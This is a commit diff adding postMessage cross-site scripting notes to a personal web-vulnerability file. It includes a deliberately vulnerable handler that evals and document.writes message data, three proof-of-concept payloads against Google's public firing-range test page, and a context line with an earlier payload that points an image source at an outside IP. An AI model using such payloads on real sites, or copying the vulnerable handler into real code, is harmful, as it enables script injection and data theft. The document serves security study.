Update postmessage.txt

rudySq · Jun 5, 2020 · f2599a9 · f2599a9
1 parent 474ce5d
commit f2599a9
Showing 1 changed file with 62 additions and 0 deletions.
diff --git a/WebVulnerabilities/postmessage.txt b/WebVulnerabilities/postmessage.txt
@@ -103,3 +103,65 @@ setTimeout(function(){pwn.postMessage("<img src='x' onerror=this.src='http://37.
 </html>
 
 
+------------------------------------------------------------------------
+
+Vulnerable Code:
+
+<html>
+  <head><title>Toxic DOM</title></head>
+  <body>
+    <script>
+      const postMessageHandler = function(msg) {
+  let action = msg.data.action;
+  if(action === 'exec') {
+    eval(msg.data.payload);
+  } else if (action === 'addImage') {
+    document.write('<img href='+ msg.data.source + '>');
+  } else if (action === 'addHtml') {
+    document.write(msg.data.html);
+  } else {
+    console.debug('unsupported command');
+  }
+};
+
+window.addEventListener('message', postMessageHandler, false);
+
+    </script>
+  </body>
+
+
+--- Payload 1:  ---
+
+<script>
+
+var pwn = window.open("http://public-firing-range.appspot.com/dom/toxicdom/postMessage/complexMessageDocumentWriteEval")
+
+setTimeout(function(){pwn.postMessage({"action":"exec", "payload":"alert(document.domain)"},"*")},2000);
+
+</script>
+
+
+--- Payload 2: ---
+
+
+<script>
+
+var pwn = window.open("http://public-firing-range.appspot.com/dom/toxicdom/postMessage/complexMessageDocumentWriteEval")
+
+
+setTimeout(function(){pwn.postMessage({"action":"addImage", "source":"<img src='x' onerror='alert(document.domain)'>"},"*")},2000);
+
+</script>
+
+
+--- Payload 3: ---
+
+ <script>
+
+var pwn = window.open("http://public-firing-range.appspot.com/dom/toxicdom/postMessage/complexMessageDocumentWriteEval")
+
+
+setTimeout(function(){pwn.postMessage({"action":"addHtml", "html":"<img src='x' onerror='alert(document.domain)'>"},"*")},2000);
+
+</script>
+